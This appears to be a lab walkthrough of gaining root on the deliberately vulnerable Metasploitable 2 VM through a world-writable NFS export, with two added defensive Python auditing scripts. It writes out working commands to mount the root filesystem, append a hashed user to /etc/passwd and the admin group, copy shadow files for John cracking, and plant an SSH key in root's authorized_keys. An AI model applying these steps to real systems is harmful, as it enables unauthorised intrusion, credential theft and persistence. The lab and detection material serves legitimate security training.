Exploiting Metasploitable Without Metasploit — NFS Enumeration and Exploiting Misconfiguration

An nmap scan of the Metasploitable 2 VM shows that NFS ports are open. Running the nfs scripts that come with nmap gives us enough info to know that this is an easy avenue for gaining control of the box:

nmap -v -sS -p 111 --script nfs*
111/tcp open rpcbind
| nfs-ls: Volume /
| access: Read Lookup Modify Extend Delete NoExecute
| drwxr-xr-x 0 0 4096 2012-05-14T03:35:33 bin
| drwxr-xr-x 0 0 4096 2017-07-05T01:02:05 home
| drwxr-xr-x 0 0 4096 2010-03-16T22:57:40 initrd
| lrwxrwxrwx 0 0 32 2010-04-28T20:26:18 initrd.img
| drwxr-xr-x 0 0 4096 2012-05-14T03:35:22 lib
| drwx------ 0 0 16384 2010-03-16T22:55:15 lost+found
| drwxr-xr-x 0 0 4096 2010-03-16T22:55:52 media
| drwxr-xr-x 0 0 4096 2010-04-28T20:16:56 mnt
| drwxr-xr-x 0 0 4096 2012-05-14T01:54:53 sbin
| drwxr-xr-x 0 0 4096 2010-04-28T04:06:37 usr

| nfs-showmount:
|_ / *
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ / 7282168.0 1565724.0 5349444.0 23% 2.0T 32000
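The nfs-showmount line "/ *" is the misconfiguration that makes the rest of this walkthrough possible: the root of the filesystem is exported to every client. The following is an added example, not part of the original post, showing how a defender can audit an /etc/exports file for that pattern and confirm a corrected version is clean. The exports content, paths and client addresses below are constructed; Metasploitable's actual exports file is not shown on the page.

```python
"""Audit NFS export definitions for the misconfiguration the nmap output shows:
the whole filesystem exported read/write to every client. Added example, not
part of the original post; the exports content is constructed, not the VM's.
"""
import re

# Constructed /etc/exports content mirroring what showmount reported ("/ *").
WEAK_EXPORTS = """\
# constructed sample, not copied from Metasploitable
/            *(rw,no_root_squash)
/srv/data    10.0.0.0/24(rw,sync)
/srv/public  *(ro)
/home        192.168.1.5(rw,root_squash) 192.168.1.6
"""

# The same shares with the problems removed: no export of /, no wildcard
# clients, root_squash stated explicitly on every writable share.
HARDENED_EXPORTS = """\
/srv/data    10.0.0.0/24(rw,sync,root_squash)
/srv/public  10.0.0.0/24(ro,sync,root_squash)
/home        192.168.1.5(rw,sync,root_squash)
"""

# client spec is "host" or "host(opt,opt,...)"
SPEC_RE = re.compile(r'^([^(]+)(?:\(([^)]*)\))?$')


def parse_exports(text):
    """Return (path, client, options) for every client spec in the file.

    A line with a path but no client list is exported to everyone, so it is
    treated as a bare '*' client with default (read-only) options.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs or ['*']:
            m = SPEC_RE.match(spec)
            if not m:
                continue  # unparseable spec: skip rather than guess
            opts = [o.strip() for o in (m.group(2) or '').split(',') if o.strip()]
            entries.append((path, m.group(1), opts))
    return entries


def audit_exports(text):
    """Return (path, client, issue) triples for each risky export setting."""
    findings = []
    for path, client, opts in parse_exports(text):
        everyone = client == '*'
        if everyone and 'rw' in opts:
            findings.append((path, client, 'writable by any client'))
        elif everyone:
            findings.append((path, client, 'readable by any client'))
        if 'no_root_squash' in opts:
            findings.append((path, client, 'no_root_squash lets remote root act as local root'))
        if path == '/':
            findings.append((path, client, 'entire filesystem exported'))
    return findings


def is_hardened(text):
    """True when the audit raises no findings."""
    return not audit_exports(text)


if __name__ == '__main__':
    for path, client, issue in audit_exports(WEAK_EXPORTS):
        print(f'{path:<12} {client:<16} {issue}')
    print('hardened config clean:', is_hardened(HARDENED_EXPORTS))
```

Run it against a copy of a server's /etc/exports; any export of "/" or any wildcard client on a writable share is exactly what the showmount output above reveals from the outside, and fixing it at the source removes every technique that follows in this post.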

All indications are that we have access to the root of the filesystem. First we’ll create a folder to mount the drive on our Kali box and then use the mount command:

mkdir /mnt/metasploitable
mount -t nfs /mnt/metasploitable/
Write Access to Metasploitable Filesystem via NFS

With full write access to the box there are a few different ways we can turn that into root access.

Since we have root access to the file system, we can manually add a user by modifying /etc/passwd. First we’ll need to generate an md5crypt hash that will represent the new user’s password. OpenSSL can create the hash for us with the following command:

openssl passwd -1 password

In the command above replace “password” with whatever you want the new user’s password to be. The output is a single md5crypt hash beginning with $1$; the one used in the next step is $1$PgYGmDGT$ZMA4hIY4So5It35ald2JL.

We’ll take that hash and, using the existing entries in /etc/passwd and /etc/shadow as a reference for the format, create a new line in /etc/passwd that adds user2, and then also create user2’s home directory. First make sure you are using the next available unique identifier for the user and group, then echo the lines needed into the passwd and group files:

# Check which user and group IDs are already in use:
cut -d ":" -f 3 /mnt/metasploitable/etc/passwd | sort -n
cut -d ":" -f 3 /mnt/metasploitable/etc/group | sort -n
# Update /etc/passwd (the hash goes straight into the password field, so /etc/shadow is never consulted for this account)
echo 'user2:$1$PgYGmDGT$ZMA4hIY4So5It35ald2JL.:1003:1003:just a user,111,,:/home/user2:/bin/bash' >> /mnt/metasploitable/etc/passwd
# Update /etc/group (the trailing colon for the empty member list is required)
echo 'user2:x:1003:' >> /mnt/metasploitable/etc/group
# Make user2’s home directory
mkdir /mnt/metasploitable/home/user2

At this point everything is in place to ssh to the box:

Manually Adding a User and SSHing into the Box

Obviously root access is preferable. We could just repeat the same task as above, but in a real-world scenario someone will (or should) notice pretty quickly if the root password changes. Another option is checking /etc/sudoers to see who has sudo access:

So we’ll add user2 to the admin group and the next time we log in we have sudo access:

Add user2 to the admin group
user2 with full sudo access

Let’s copy off the passwd and shadow files to our Kali box and use John to see if any of the passwords are crackable. We’ll use a tool called unshadow to combine the passwd and shadow files into a format that john will use to crack the passwords.

mkdir /tmp/metasploitable
cd /tmp/metasploitable
cp /mnt/metasploitable/etc/passwd passwd
cp /mnt/metasploitable/etc/shadow shadow
unshadow passwd shadow > unshadowed.txt

John was able to accurately identify the hash type and crack several passwords right away. Since this isn’t meant to be a john tutorial I won’t dive into all the potential options available to us, other than to say that you may need to set the hash type with --format if you know that john has identified it incorrectly, and --wordlist can be used to try wordlists other than the default.

John the Ripper Cracking Several Metasploitable Passwords

With the msfadmin password cracked we have root access:

The third way to gain root access is to add the attacker’s ssh key to the authorized_keys file on the victim:

cat ~/.ssh/id_rsa.pub >> /mnt/metasploitable/root/.ssh/authorized_keys
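Each of the three routes above leaves a distinctive trace in a file a defender can baseline: a hash written straight into /etc/passwd, a new member of the admin group, and an extra authorized_keys line for root. The following added example (not part of the original post) checks copies of those files against a known-good baseline. The baseline and current file contents are constructed, except the user2 passwd line, which is the one used earlier in this post; the key blobs are base64 placeholders, not real keys.

```python
"""Flag the three persistence changes described above by comparing copies of
/etc/passwd, /etc/group and root's authorized_keys against a known-good
baseline. Added example, not from the original post; all file contents below
are constructed, except the user2 hash, which is the one shown in the post.
"""
import base64
import hashlib

BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
"""
# Same file after the walkthrough's echo: a hash sits in the password field,
# so the shadow file is never consulted for this account.
CURRENT_PASSWD = BASELINE_PASSWD + (
    "user2:$1$PgYGmDGT$ZMA4hIY4So5It35ald2JL.:1003:1003:"
    "just a user,111,,:/home/user2:/bin/bash\n"
)

BASELINE_GROUP = "admin:x:112:msfadmin\n"
CURRENT_GROUP = "admin:x:112:msfadmin,user2\n"


def _placeholder_key(label: bytes) -> str:
    """Valid base64 standing in for a key blob (constructed, not a real key)."""
    return base64.b64encode(b"constructed-key-" + label).decode()


BASELINE_KEYS = f"ssh-ed25519 {_placeholder_key(b'admin')} admin@workstation\n"
CURRENT_KEYS = BASELINE_KEYS + f"ssh-rsa {_placeholder_key(b'extra')} root@kali\n"


def parse_colon_file(text):
    """Split passwd/group style lines into field lists, skipping comments."""
    return [line.split(':') for line in text.splitlines()
            if line.strip() and not line.startswith('#')]


def hashes_in_passwd(passwd_text):
    """Accounts whose password field holds a hash rather than 'x' or a lock marker."""
    return [f[0] for f in parse_colon_file(passwd_text)
            if len(f) >= 2 and f[1] not in ('x', '*', '!', '')]


def new_accounts(baseline_text, current_text):
    """Account names present now that were not in the baseline."""
    known = {f[0] for f in parse_colon_file(baseline_text)}
    return [f[0] for f in parse_colon_file(current_text) if f[0] not in known]


def uid_zero_accounts(passwd_text):
    """Any account other than root with UID 0."""
    return [f[0] for f in parse_colon_file(passwd_text)
            if len(f) >= 3 and f[2] == '0' and f[0] != 'root']


def group_members(group_text, group):
    """Member set of one group (fourth field of the group file)."""
    for f in parse_colon_file(group_text):
        if f[0] == group and len(f) >= 4:
            return {m for m in f[3].split(',') if m}
    return set()


def new_group_members(baseline_text, current_text, group='admin'):
    """Members added to the group since the baseline."""
    return sorted(group_members(current_text, group) - group_members(baseline_text, group))


def key_fingerprint(key_line):
    """OpenSSH-style SHA256 fingerprint of the key blob on one authorized_keys line."""
    blob = base64.b64decode(key_line.split()[1])
    digest = hashlib.sha256(blob).digest()
    return 'SHA256:' + base64.b64encode(digest).decode().rstrip('=')


def new_authorized_keys(baseline_text, current_text):
    """Fingerprints present in the current file but absent from the baseline."""
    def fingerprints(text):
        return [key_fingerprint(line) for line in text.splitlines() if line.strip()]
    known = set(fingerprints(baseline_text))
    return [fp for fp in fingerprints(current_text) if fp not in known]


def audit(passwd, group, keys, base_passwd, base_group, base_keys):
    """Run every check and return the findings keyed by check name."""
    return {
        'hash_in_passwd': hashes_in_passwd(passwd),
        'new_accounts': new_accounts(base_passwd, passwd),
        'extra_uid0': uid_zero_accounts(passwd),
        'new_admin_members': new_group_members(base_group, group),
        'new_root_keys': new_authorized_keys(base_keys, keys),
    }


if __name__ == '__main__':
    results = audit(CURRENT_PASSWD, CURRENT_GROUP, CURRENT_KEYS,
                    BASELINE_PASSWD, BASELINE_GROUP, BASELINE_KEYS)
    for name, hits in results.items():
        print(f'{name:<18} {hits}')
```

Fingerprints rather than raw key strings are compared so that a re-wrapped or re-commented key still matches the baseline; a writable NFS export lets all three files change without any local command being run, so host-side logging alone will not show these edits, which is why the comparison is against a stored copy.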